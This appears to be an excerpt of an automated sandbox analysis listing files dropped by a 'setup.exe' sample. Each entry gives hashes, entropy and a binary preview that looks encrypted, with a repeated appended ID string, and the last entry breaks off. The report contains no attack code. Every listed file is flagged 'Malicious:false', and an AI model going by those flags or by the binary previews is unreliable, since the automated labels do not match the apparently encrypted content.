              Preview:<?xml..t.%...l.$...d....E/I.t%kmc.D.b..r..qj.N.....N.9s-....#.)...].!.S...m..7o...}.........z.%...>....\h^s.K.wW...w.o..A..2....6........}ocz...U-.8..?.c..y.....X(.v....ci..uT.......{.?.. A....4b.<.6....9.k8y.{.|]P.?.a.A.:v../d...G..>.E..-0..Y.e....&.{.=k.f.dh ..w.......5.)[w.e..F.[......~CE...n..I}E..-.t...|...br..(7$....Q..P...1..l..FSF`.;.zdah.....(.vP0..O.FC..?)...XIR=..K.x.....$t.`...XT.})Mf...v.#....TJH.@,v.I..u.G.+zX,...,.j..G~V.."....M....3..w......Y'..[.BIQ...6...J..}.0.m.......H.7....HU.,..dP...(k..H|..XE.YC..K.w.L.-.-P.d..?L@..@ F.%.7.1...jJr7.,.D.Jy^)..N90.....8.v9v.N..o.{.......c...Bs.....R.....t..Yn.@A.|?.|....k.R.o....[]....!..g!...Fl6..M....}r.al.k.8.{......s..F.... N"........p.....J.....Fw...@:..u..K!.P.1[M...d.O..c..3=e.'.^i..5...L..E.( .....c..'X..6.|.vR.6s....8..O^I3T..k..W$..G.@.;L...(DJ....".E.]..H._...f......k.~..v..M.......-.'....4...Z.pe.........x.z....`...?...l..."..{.h.O...V.+.6.N...L.t...qP..H.E..;.S.....w.pv..6J
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):927
              Entropy (8bit):7.793853600838658
              Encrypted:false
              SSDEEP:24:4GdaqVaT/noCwvISukSp6Iu/xOnMzZtfYq/GyYAbD:ddaqV5ZISukSxNGZJDGyYaD
              MD5:EE8450F8DB4578DA21070E2C988741B6
              SHA1:51C3DE19673217649F9711AF80E52DCCD9AC2FDB
              SHA-256:45624F7F4FA35001ECFB724CABACA1D01B6D791CC92589123BC0D9DB12BEBE65
              SHA-512:EF2AE4F4FCDCB1A857077DB0E82B612D7692F2A704607E050A80A116B2731B5F166F8DD5DB7E8E80449403C70E774C6B4E37CD81479CDC3D6FB30793906BFDE5
              Malicious:false
              Preview:<?xml....q.<1........OX..z.H."^K\.O}C...T...K.......{a.....!.V0#..=F.\b.Sq+&.3..#.......N5W...}....G."......4C.......J>..#.F.0S.-.>.\.....S......v..GY.\+.......to..1..............SW.l....9.0..k%...%,.B&,..n.AP..N...QO<.?<.f. r....no.B.#.......m..e.[..1.....%g...y ..h.}._.f......g?.....!.7.bW|.....;....X.....M.\..gw......c...|8.B..%....R..wP.j..|.....V.....F.GP._~Ec.r..i.zL@."'$9....$.~Dr..n.aI.>..A%.C.gXi.Zk.*.x.[..u.....\.!...=.C.Q...a9y....]7I...g5.wH....t..!..^.<IJ....\C.-{......H4.`yD...ro&...h.......Y.W......g..|;.CW..C1..t.".^.@.^n.2..../.op...7l..L.X..-........._..1..C}....S.S....F.9.....9'.....$.d...p.1.....,F...2K..AN...CDniS.p.%......V.8:...n.|0...>:<..&.5b.zo...$...nQ.gPUt\...?.9k.. r..#.qf.hs........0.L........Y...."...E..!(.&..J.t.{...2.~z.......D.W.....M..vvxb`..v.:t.......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):717
              Entropy (8bit):7.693451853986275
              Encrypted:false
              SSDEEP:12:KIOVeADrALk4irJsVcqkIlHU4hMNcR9fbcX6N5y+bau3xdctxBoHp8mcXQsMR2cq:zakk4itzPcRRbcqN3au3mxBtzpbD
              MD5:9FCE951DBD90B261BF401889E1ED3F8F
              SHA1:636CA504F6A5448B3793A5BE34806936ED864F4B
              SHA-256:1235645615961532A9136F0833F005AC65DF0C25C1F230DAFDABB3D1AA857C8F
              SHA-512:CA63BD896563D50BADA6E52C135ADC28EF2141E3FD6DB7B50F1BD8B8CDBA947EC16B39515C9D68B8475B6A820AF34ECB82FC20341E976A3E59E759F309E17D24
              Malicious:false
              Preview:<?xml..t..-..3o..f....5....t.F....4..%....y...B.:./....U\..jx.......K.eq.%_..N..<.Ne5.!.8?..)..C.....'..~...(N..u."..:......S....Ut^......N..p.....$...'...h.L..d.....@m.2.:T&g2..m..Pv.z..@..45#.-.S.|...m..q.Y.f.!P 9..Wj.%.X...}...t..{.{.z'D.C....L..!l../.....'.....T.S...%H...&[`.c{.6..l.CX.<.3:......".(...*.X.N...<...i..g.....-7.[K....7...R?.(....m....r........>p.)[T.>.B..\A.....f..7.U.....!.,j.m0..5..;........).q..c.eA7.m.Nf.ig?..d..w. C...4v.C......e@..Z..2@.$.x......%.P..X.q.v=..z'.3...#.V.....n......(6.^~...pS..2v.].|..M).x?b.....%.r..z~MZ9.hoM.l{Aj......B..+.H3....t/~^.m..1.;>O.8..."..A.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):942
              Entropy (8bit):7.775373106044076
              Encrypted:false
              SSDEEP:24:QXa/0/p/4BBQYyqS5qO0C+4cu6DCKqII7xAOLfIYdLJ8lF8bD:2Cm/4BBQ3qzC9cuS1EylMD
              MD5:A70A1813E501AC10196BADEFDEBAB64F
              SHA1:547E8CF580524023C572615B4F113BF40BB7363D
              SHA-256:3FF38D290F39D0CDE2417D77FF624B6034B6B510E900348CFB619FD1742D55A3
              SHA-512:D5D7BFCA9CF1821AD3534740CBE0828BCF7043AF0C85CFCD8B7F64C52CEA46B4DD775D8BB033B006086D11409CB570C996CFA7E955151DF0E45605ACC266FA1F
              Malicious:false
              Preview:<?xml2..$.f....v..R.bk..H..X.1.C._..b.'.......Bp?Q/s..B.eU...3..U(..C....b..*.}%..D..H.....ny..J.I.....Dkx...]....WdqP.].2.Z..zF........r.....u..P$..v.L...W.>...".=..!T.....1.q=..K.;.....{.'..l...Q.D..b...x_.WW..5.q...A.....C&..sL.0....3..\....=....B.x.. EU..GY...FQ......1.1.%\..V+/.d.t\.E.F......Uy...8.g.,...o...T.G2....|......0..8....kt .\v.K.eC...iD.f...p..............z ..'D.....L.P...IUC........nY.#.. ...g.l.?ru.z.~.]3.........9..^.........x_......I.2`...2@.%..B...H.mw.T._.x.E.G..P...M`).".I..w..H...)M....*.P>...h..8u.u.eq..5..E........z$..xL..X..8....L_cW.,.k.V?.........`....O..X../..M&..*..lF/.3{i.>`E..9..,.[..9.T hq@.].TDXZ3.....8r.;..3...Kt.f.c.'Z.\..'.K`..).e.z7..4.B........u..z.R.Q..k..RE......h..s[_.S....M.IqqU...K..rCZQ.P:..{2o.3..(.....1...6.(...~.8..0C.....#2 .......G|.J.w.59.....:K..1?.&...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):949
              Entropy (8bit):7.758135131566145
              Encrypted:false
              SSDEEP:24:WLvy8SJztYiNWbWDIVqSLGw3CZsUIItvb7R2obD:bz5NcXZGHzPD7oyD
              MD5:F896BCCD548B3FE87F183FB03E88B02E
              SHA1:AE9504A69A7658763B329388DAA3FC74C5A6F119
              SHA-256:53766B4A8D8AA6E6EB05F8748B12FA2CB5AC9ACCD20B61E312F05D4F6F79B902
              SHA-512:C914D48C160A1120C0F95507922350809521CF373266CD6C0F6FDE50A41B741110007C2DB124961A98C084EAA4F01E3DDD12572F59E08A19132A6A21F8957179
              Malicious:false
              Preview:<?xml..0<..&,X...*.^O...(...^Gae...B..4Xli.;6.t.....A../.3zg.ea...Uz....iB...p..BI....*#.......B..C.5.. +x...Pt.,...........e.s...V.~.c..(.........B/q$...$Pb...C9.eX.z.%.YsP..Z.s.oO....9P.]..$..GK.=+..O..b....;T.al...g......AYg.........K..gz.Gr...)Mmx...'...."5....2...8Q{....f........cO.M.'$.=Azr....I.d.......wI.X_.../......f$...).......O..q{.sk1...?A6....p.@..k...Z,..X.B.~.;....U.....i7.-..H..T...3".V.Jq....f.#.I9...},f.%.9.>.jz.....&s....]...A...7.W...oM..o._1=}....M....I..O..z...-s......c...w.L...,./....r{......'......N...I>..f....;.~>.........H..,..D.1T.......t.69..G....?Y.|F..r.R..Ut.l.s.F.....$....ft).|..6..@.k..-..cp.{.W:>..K.w..G>a^...f.#..B5........}......&+z.Si..X.....O?8.....<F...3.`.=..kG...L[.P.].U&(...5&.E~.pa&..y.i...m..X......gm..e..9..f...1Uj...o(.......].;lF.W.O..s...L...-./r.|...EV..}....H.+I.mVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):867
              Entropy (8bit):7.708922259810015
              Encrypted:false
              SSDEEP:24:7VD+riKxHoipx+RFYKeuDc27T50rHaguSbD:5+tDsReHe0rHaguAD
              MD5:6F356494252595DBB476F0DE15666A1C
              SHA1:891BDF32DD5A5B142AAF86447853A278096868EA
              SHA-256:41B1D860ED6D769973982D4562DFF6241A28BAD0BBC0FE810D12E5553A611628
              SHA-512:413C492F170A697E1AB5126ABD350F39CBD210BF23B113EDB18F9FFF6621907818FD8925FD56DD2A3972608A010A80A79400D697FA3A21367F21B07BF9D89883
              Malicious:false
              Preview:<?xml.n.@.Z.;I.}.w..x}Nj.|..O7}r9gs3.....8l........u...B..:}...9....FF. v.9d%..>......Na.R.......<9.I.O.=2xmE.$....+...^T.F.~....u...........`Nu.....v.9..~T...w.P.@S>.....}.>W...".7....[...-j.S^G..;.?.....`.....3I..n2..A.I|...=o;..[..+...}x..#.......|..r...0.b......V.%?{0Yn6.2.PAZ._M....I.Y..ku(p...Z.....G..gH".n*.....jJn.C.0.L".X...?...lb......n..V...oT..E9.....]\..j.....Za.K...^...."...4_\.~......%.%...R6..G...Nl.o[...p...a..^..^G.Bt...d.CE..i.......L.V=R.....Qns9..:g...].Q/..)hW9...).l9...[8.;..r.N...b.n..;..x.Q....i.=.bq...z.&x.IW....,...[.M.=$Q....xso..4A..+..-};s.y9.@...E..t^r.....(_x%Vt...2['.k.s#s....a.E....&P;.vd.lg.....Q6b...H1.S.].ke....O`.I22...TL.i.q.(...z\...D..)C.S....t......4.f..3.......Bh......g.X..Q[.D......G.HXx.T..j..}VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):918
              Entropy (8bit):7.750200204465425
              Encrypted:false
              SSDEEP:24:VPR3BMYX2Uth481B1L9nAobeCnssY7KBbD:V/DX2UT51LxAEssY7oD
              MD5:4FC47D25F334480FC92AB3B1ED16EC78
              SHA1:AF4791244692792021AB5C7BC20CDE66AFFDF8F3
              SHA-256:825DCD116FE752B529F5AE41E3106BB33CA79487ABBD9C40AC48DEF724C61856
              SHA-512:DB4AA25231959AC504527CDDF206A68964E388BFE1808149F2CC1B69423FE5D7A77754D2B5C78509C45A85FCFB52D9EB902BC8EBDA0258E08A32F873B43C1036
              Malicious:false
              Preview:<?xmlc...S`.l72._..@....>B;.P.u....z.......K.y.....S...M[B.2.9.s.9A.l.o=.n...r.9%B.nh......X9&.3..x..M......?..wf.j...:.v:.........X..?...y........N..R...qF?.\).!.l.U.O.T*VT..u....@...b....BS.....~..Fg.aG..%.z.4P.P.......HR1?D.M. g..=.64a7....W.R_.r........2..`..9.......~.FD7.{.0..4.D.B\~..n?B.{.[#b&....!./.z.(..N..g2..Y.L...'.Yp..]..9..."]...5.U/..~.......9..#...Q.c..>..|Q......YQ.G..d...g...XC.a.5u[...V.o..F.N.@>.m,}O...,....O...e......na1H....?O......z1.J.[?.jk.....2c.b.Ca4.....(.*...Z...0.@.b.1.<+.^...TOtr.5.....X.....2...0BW.7...k.;....5..dy.R.........rN.]l.s.......j.z....Q...aW..p...@.|..Z]6.']..2pU.....i^..E...W.O\.=`.gVr.~:W.0]Lq..c....y....[@.#.+b.|}...[_..:........(0Q<....9......cX.F..cT.k@.D.sb...0..........f..#,{..].(..z..W.].DL..b.<.... .qW...wW....>4.........J2..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):898
              Entropy (8bit):7.798064674912986
              Encrypted:false
              SSDEEP:24:1v4yslsHMqaU/y4jD1pxIUhAci1qICMvLoVQOhBibD:1vUlsHMqLy4jzxjGX86OcD
              MD5:8D0906A0DA1F368022E11E996636F302
              SHA1:F7669966CC94FDE4739A5FE0CE1876BB46B403A2
              SHA-256:702B773BCC318F2DF064133881D7564A591862342B7FE1B4D990999E4659B6AB
              SHA-512:A7CFB4555B845390002D7F3CA32BBE6E1D08B4A5BCEF0F68863648ACEAB7A73CA81A4282CF73E48275D593F4319759E43B672BEF5CFED3515BECA807ED6D4503
              Malicious:false
              Preview:<?xmlD.t.K...L.....y..E.G..u.._.-..h.O.#.B....U\Y..A.....q...G.&>:.!c..x..71.HC.D.s(a|.7oFL...)[>..?u.U*QR....o.....5'?{{.b...")X.U.\..xet..uu.j..\'.Gks..!e0.N...Z.D[....$.'......l..3nw........_......../%.4.OK.@..@)W...Iu.u..7......A2@4.V.Wx.....d..G..h.1.z]..~{..L.$.c....|'.N...O+..]{.)....p.=.lNx .....~.U........p....V.A<iz.)...q..L....-.;L..sF.Gd....'.oPJC..l.lL...[...9.o....._|.....j...../.m...fn....b..k*.b(.#.8u...1.,.Ug}...f$k.D...o.U..[(K#e.q.O.............._......=...@.....c.g.L..si.........t...".^.z....g;.. ..P.:.;..+1..'G.u.4.....2c%.g.X.Gy.k.O....h&j.m.j.....6..{.E...iJ.Vc-..qm....#.[!...OU...S..sg.~..1..[....+..F!c(~"..`.-)..q....k..N:...B".A......>;.%J..a.$..{. ...~j...V..~...@.C[.j.E5..V.gIyu3.._m.he..A..O....?...A.i.?...8.o......`...<...[$..i;...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):798
              Entropy (8bit):7.708716294635138
              Encrypted:false
              SSDEEP:24:Y3amqvlVVStrTqv0c9DP/oty+kzV1FGuXtkfAqPyepbD:Y0SseyXVmuXsAqaeJD
              MD5:C72C662060C050A137EF557C85F40308
              SHA1:F94A6061BA512271E71E51F4F60943D26427EB9E
              SHA-256:C19911E0F4361E41D45E1A166C5777ECDC0942993401CB1A13D621524B6D3981
              SHA-512:1DEFD41AEE0BD309A587199A2F4A3C2AC95E13671D35D13F3125ACE4EFF3D45DFCF808AE337B4C029947977DA576BB6D9775C593D0E709063AC84307EF997C8D
              Malicious:false
              Preview:<?xml:.4.HH..L.c..p.....(..R,......c(.0..Kb.s\.DfRc...j........6...........B....;5f..h..+.......X.X..U.&...eS.b.96.*u...o.Q.._N....@g..iN.Ky20Go..u+#...."X..(.uB.. .4..i..\_..z.....9u..'..j..i..x.#..l..C>....}w,guY[4..H.]j.bx5K".j.t.).."7.+...kZ........z^..K..".y+......*....B..i...s-.b....e../{..u...c.....a..:cN..T.~ESAj..).,PL...5..r~...)...:....(.Nv...).H....a.PG..J...(.d...}.j.l-...@.d.i.mIxZ.*U.I^mL..2........H.[XZ..f.B........ ....).^..........1....F[B.)l....$/....C.w..%J..i.0.......<...........v.K._....h'..d4.D..W.l.J?.>.......M^^v...$..5f.0....8-.......>....Mvl.U.j.G..K..]...*dh.r..N.iIT.AkX.,."0.d{!.zC.S..Nk..+..\d[x...t... ...".t..$..`.....P_w...56.....ku.....Z\.I._...1VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):788
              Entropy (8bit):7.711487119987679
              Encrypted:false
              SSDEEP:24:Ov75ublCok3DdGwCj1gXPvZN2gcw4FpbD:CulTk3DdGk50gH4FJD
              MD5:455857C33599C9EFA4BF6BC2772A7B03
              SHA1:18C46D69FB47099C452ECAEEE0FD0104F8B5286E
              SHA-256:76ED337B039593605A263C871BECFE31C6BED1728C9D2ABB2BB347D09F5AD7E3
              SHA-512:9045BFF901C4A433F366928A362F4D25DCA3E713FB37415E848F4E3B311F29FE819A9DFBB12D74CC84F840C4F21DC661F4B9AC721AECF9CE72A55C852387656A
              Malicious:false
              Preview:<?xmljK....#....4P-`...5.gL}~..7....mD..t....qQ.l[......a!>Q.)..i..ap$.9....o.KO.@..e8~?n.T.E.`..>._...B..Z......r.g.4z.8".:.^vw.......e..jf...Q...x..C./dI.M....s+..H.C..>..B....j.....R!....D|.$.\......ANC..e..!..fN..5m..<..&.UZ.+.G...j.QJ...]...*..-$.t...hb......W..%..vX.......m.U.y.:....RT5e....v....}..B.'P......U.v~..<...kh.%.2..(...";..?7.C.Q..w.r9...e_!./>..y.Y^A.<.....+'..3UG....m..>..G<|..p...Z..|.+~......4.m.........3.....NP...v....1.?..&..!.m.j".&..[%A_..$h.L..).^...s..v..........r....&..'.cc...uK.Y%|'...*{.WW_.U..E}.u%u...Z ....%.w..[....HW))zk.......Y'......w.....k.i...s.8....N..Rq!.M.9...*....Pb..~O....c.^..S6.@...Gt..9D..v...x._.6.P}.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):987
              Entropy (8bit):7.7989348728884575
              Encrypted:false
              SSDEEP:24:rMbhvkyW4bSfkYrTZmOyi2aSNSeTUtRYFlW8MizrsnYbD:wFh1CyilZ9o6nCD
              MD5:FF42D0526C2D9DEDB60B16A13014DB9B
              SHA1:81DD47F98BA4EDEA2B67C2B370F151E6B7861446
              SHA-256:19F26CB5DC3B424971F224449BB9181B4E9F7E9DEEA849E5372BB10E70936386
              SHA-512:FAC437B0B447B9497F0DFE7F0427D2C0B5468EE1885C7FA1990950AFADDF1F1FDF5240A274772621A0F8B4AB47F9AB22848EEF997A5EBAB4CE56B733BEE3134E
              Malicious:false
              Preview:<?xml.2..5...~...IQ.K(..... .....ao.....i...U=|Qa.q*....H..N.S7Q..F.l.....s...../...1.]lg.m..DU..A...d.5...&Z....Ok.. .SV..g.........a{...-.@....</..*y.9.A.....8$.!....e.c.;...Ki^CU.Ws.h ..3.9).5..i}.>7..&..w.a.7.Vz;.u...k..\..e.......{.d....Y$.T.......)k......j"..`S...m....!y.t..q/H..|Aw.....b.!..*._m.....s......&..........7...._...(5.....".....?.L..`..J....w..f'F}...Gx.Bna...5........>i-...$..mkk..JG|l..zeq.b)..oZ.g....._..........w....g...&;I...<.:...h(u{..F..k.7.Q......SY.\i.....}.&P.9.n....2...@\...}..g..O.....B.:q&........".~...E4.i.....l.q.k...@.4Nh..T.....Z......^.8.Y.n..V.w.9;f..od6..-.....B.(s....K..6....zm......h+G...N.3..WR.w^2...&...[2v....rLp...P....}0y/uQl.1.....!U#/.Nr.`..A....TI~.%.....Z..P.x..h......X...l.Y.[.>...../.....m]".R.AU..._8M .U....\.*....*.....T....6..E..D7$..-.e.@7Q.7Q.Y....M.\.5.<...:l......4...O.R?...p....&...%..w.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):996
              Entropy (8bit):7.80781506780924
              Encrypted:false
              SSDEEP:24:AKaZBAeaFChfzy0Y/bQjuHy2X2WEfUp8sEE11acZbD:AKaKCJYMS59xhEE1/D
              MD5:0040EB95DEC143B3E69FF3E509509CBC
              SHA1:AA2FD5121609A16CB1A8784535C4BE63EC24D801
              SHA-256:38D7EA1C038B7358A7795A9C0065A4B4CFA0C08CAF36D2EDA023B3FFA0AB67F2
              SHA-512:BE69B3D3A291DA4E5A5C07AED89DE21B31F6B39A9BB587095B6A8E0D9D516753BE4CB97F6BA7616BFA7C0B88FAF9F77926620920A7D7E4AEF7E5BD71EFB4B838
              Malicious:false
              Preview:<?xml..AF.".C.0...}j.rC.B....J!.lN.=02-........#..p.<.>.l.|..Y.*..*.oo..v....>0k>`ZN.........9....\.."...?......{..e.p3....M..a.c_F.}JP3.Y-i..\..R>.._Y.....}a..j4. ......>=.<....U.Kv....X.s..<._J.O...y...)..O.g....d.....M.ELRB7.hOcd..^.y..'.e.%....i.+.W..4...|n.....a....8#.K...L7!.........(e.`..F......'....o;d..../........a..'C.R..r...dY{.Cj..e..-dy.....kx.......%..]f%..?.."...NU8..x..........H).....NvMe.i.O.s8.Z.s7kVfP..J...A.m.dh.u.p.U.q..C. :....q!F..*_..j../.h.\V.9...#."....U+<l...Q.hVQ.k.8.9..9....U..... ..0...\...m......=.U...F...n...........F....;u..~|zg... ..E.z..r.u....f...Q....1]..-5.....;.X..-.[k ...A..&..\.@...jg.'..q.:.....z$=...G....96.g5.o...8PN.Hc4..P.s...!.g.E).^.h..?.^..7...Wu..h0l..=. .Z.......s.Q".;r..b.......rz....c.....K...e......6........Y..%.Y...x...Q.6..O..Ax&..]..C8T..z..4......VqY..{qyf..X...KT..:.#...t.Q..-.8-..?+b..y...2..V..M..&VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):893
              Entropy (8bit):7.762839040000491
              Encrypted:false
              SSDEEP:12:y4RTpi+KA3GJSHH8+ox75ikmejOxQ5uy2hM7pki5XDUnGW/wubFwmJ8MwOQcyzJu:pRTMUjHH8nF5jx9kWhw31HJUOQcbbD
              MD5:04D6A62206B71148DD00AF72D730152F
              SHA1:601E1AD2608B9A4912C9E29CBB46FC8EF1971210
              SHA-256:2B33438214CA18D59D54A82CA441F7A048351A3CDCF8BBDEAB02171381A8A77F
              SHA-512:9E42E2D3D20C7A5DD4E568FD36C18134A5074B37680762DC1A80B2CFC500B140FF2890A4F75549D95477A260191162DBFB948B22A2FDB70A3F04EC941D895CD4
              Malicious:false
              Preview:<?xml..e,...M.......+bo<a......L..q...H0.......).>......w..G.u......="..;.U........0......0..qk.cK..K.f.0p.o..d9..j.......v.q+.;.>I.DEOe..X.q.C...:...6...0].....Y..1OP........x........P..z.q.........L.1".....k..".......d...P)..{..2..\......<.../..+a..3.(..O.!.q.}_o.EF.d|>NQO:.G.$+Y..%...m.m.u].}...*.;Q.!P..8..p5....G..KU..Hg.z.v..3.I...J.M.+.KY.>...Z.=".$.f.R.3..iC.sX.(..h.J...K...b.R^....IO.?t...No...8.K.n..S .*9j..{.{..........`.. iuEC_Z^n..|....y.[p..>.....3...5..2.GIw.........x#..[g0.i..l.b5..C...9x......2.....W..3.2....DB.f5.`L.@...6s.}.l.".D.. ...0`4.....U...~....r....1"..D.....{.....k.....Y.....^..n.v.*%....:.$.A%!...H.S,.0.?1..}.....]..&.........GK...T....j.2.!02......Q.Pd...NY[.+.......)....}`.5.."S'*.......e..+..|..P...@i.-.....@C..s..c.U.S..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):799
              Entropy (8bit):7.748067885293522
              Encrypted:false
              SSDEEP:12:uQSyKDjDghtSY+AEVBVhfm8Uv4wVIwtBDHTS3R5xAhHiXtxYzRSOmjxBEsrtsMRw:vSyc/s+HVBf2v4cvAEwtyNSOdsrKbD
              MD5:DFF062B6F554444BD5C61524E881FF12
              SHA1:2BD00E5BB98C9F76641A03FDCC7A7B71F05DAE86
              SHA-256:7276ED9CBA5AB9FAC3603D0FFCE813B1762FFD9EDAE1DAD8D899E0AFFE17921F
              SHA-512:2B144644E95C86ADF9FA5E1A7FDAC9C2878628DD2F32C4D1A12AA6061406E395E101BED1295FCC986CAE647262EE0EB07BC92DB82872757CB80346A328BFA9DC
              Malicious:false
              Preview:<?xml|l _.:..j.`.......n.U2.c.. ......>.gA.......x..3}..O3..H.. .w.#.BK........p....(:.....`BI...1........mi.Uz........T.M...]...~U.]..Tf........Y.}..........WX.+#t....,t....l..;%.......|....'h.../Z..Req..K) ...R.f.z)..t..#.OG;S ............#..Q.."....<d..wp.*)m.zX\.i.Y..@.<......*.?i..7.j........AAuJ~,u....##?"..YR...5....x.z..z...{..=v......"._.<.gg..|..25..o.C^.dm...UW.1lQ..Yh'..|.M..|)..t.9...g._/.....D...N.K..H.E..{4ERN....j.6.w~....N....t..H.0............i..}Np,R......W.W0......{.su.u~.|............a...#..-...TLo6g......BS.{...+-.y{...............Z....P..c...eJ.0.WbFQD..0A]...ws.I.V91>b_....A.p..w.W<....&. ......}......W':..|06>.O.._+.r.._.......QI.]...v.....o.aA.[(......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.705048581959662
              Encrypted:false
              SSDEEP:12:WlCMifcObQdyEsDts9vt8+lR4zCyhV/zbhNhOA3qwrTcy6hJEPZ4IfOqCzsMR2cq:WXqDtsc+lwNdXhNhOgXv6hWPZYqCYbD
              MD5:C9383E838DE4D0E260BE8BA32B2FAF6A
              SHA1:798557B81DD530A4F4900A22AF1D727F99235468
              SHA-256:B76308D341F91E50499A1D2D4B82D367BABDCF296820EE3614C0606D400DEA63
              SHA-512:9C330D67A920B2E59123A1778B98BB407DCE2DE71973D7F04663E8B9AD4501F73F0E4A88237D2DFE388D8094C1EE1529862305F1735ABA7C546CD66C30787E6E
              Malicious:false
              Preview:<?xml..6k.......X .}.[I...~...SD.N.].A......4 c.g..E'...3.X&1..w.....W..T. T..2.j.rD..A.....}.=|n..8 l"C.........i..=4f.%...S...n.0~...-qj...1...n.6.H....O.Q...}@...o...Z....7......l.ct..iw...H..xy...1.M..`.v....aov.*S.Mp.)..1LC.KW.w....I..7D6?.._......N.f...O.^Yl.5.b.5...*^ps..)..V.....pG..]8....=..}.0.eS.Zx...d..^.......6..."..x{..LNy.T..C..A>..B.V..N....[.R.LF[$S@~o....Nn.....U1.{...8.@.L.,.~mr.,5..........f.H.b..np.E..pz..=.].;.w 3..U....:R:...$...U.J"..W......B5.'...(s.C...0.....w..a.eE.JZ......_...Z..*.N..z..H.6;._aI..8..d.T......T....7i.;y.....+.....x.O.A.&......`...b4{@iKNuq.0..z.........9..oP.&...*?..e..B......b.4".&.z......$_.*.,.m^.W.m.^...0...!...S...>........B...E..@.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.747200782964812
              Encrypted:false
              SSDEEP:12:lR+IN2K50QEXxyCyahjCQ/6Tgh3f4zYlWkOkILMvBBPABz5R25jj0AoU9D7asMRw:lRTNV50QuyCbX/6Te5Cz5RcPLfbD
              MD5:D00F2E55184595C3BF5C8E7CCCC66946
              SHA1:6AA246D7BE3871E20A3D0FC75F6D57BEA2202D44
              SHA-256:C54A257CF32FEBC2B69B3AF5EA5A6E1B4951564360674B4DA29356C2EB9D0877
              SHA-512:8A1634A2F77260DD25C68BDBA3825F25C1698C11165A0D5DE7891FF26102C45458DD778F3B5F0B46C57482C5E8E5E56010923E3B25FB8823F977474CFFA9272E
              Malicious:false
              Preview:<?xml..g6..lGx:..I..........._.l...th..I+.nq..V.l]T.#e..f.@E=.;YR.....>....^*......$....]A8u!P.X[..J.@...r.........7.<.9l.j..*.....Z#.....=.9....3....x.wg...Y.Y....^....2.V....g..*..F..g.6.xt!5.....LM...y....l....E....ls..K*..g...&).......i..1..[..ce.v.I;..(h..9.Ef.x.N. ._.......~.''/...a..Tz.E.."ZW..i.+7sL.$.C,......8...gj...z.z..9..x.r#.yE..[.{........>.....k.E..fj.....P._.A..8Z!.p..Rx21*...@..C.@,.......y...e[.b.v..*........H............^....e..|..w.cKl.:..l...V.F].A.z..k..T.J5A.`..y..lre..1*.t..._....A.i.....?.^.L...0.U....b9*$.. .....V........<..;.......V0.`.+HZ/.....3Rh......_.,.......9X.Pb..j...;...33..l~.....9u......lT..8p.,....\.q.F.W^.z.aa.3~.%`~H.k.B.....#...r....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1029
              Entropy (8bit):7.814424176971098
              Encrypted:false
              SSDEEP:24:iDJcjT12wqQgHCHM/iGg+WFoKu0FS/4C0BagvICqD9YbD:iDe17eiHwDgDosez6zD
              MD5:EB13870B0FB4AD0245B2C2FE08C42928
              SHA1:AEEA3F14C8E36109B3CE9C54FCB2AA5AB7067B34
              SHA-256:3AEF3F811C439390FFA03B0215FE6ADB2B421F5216AD287F27F96A8EDD6574DE
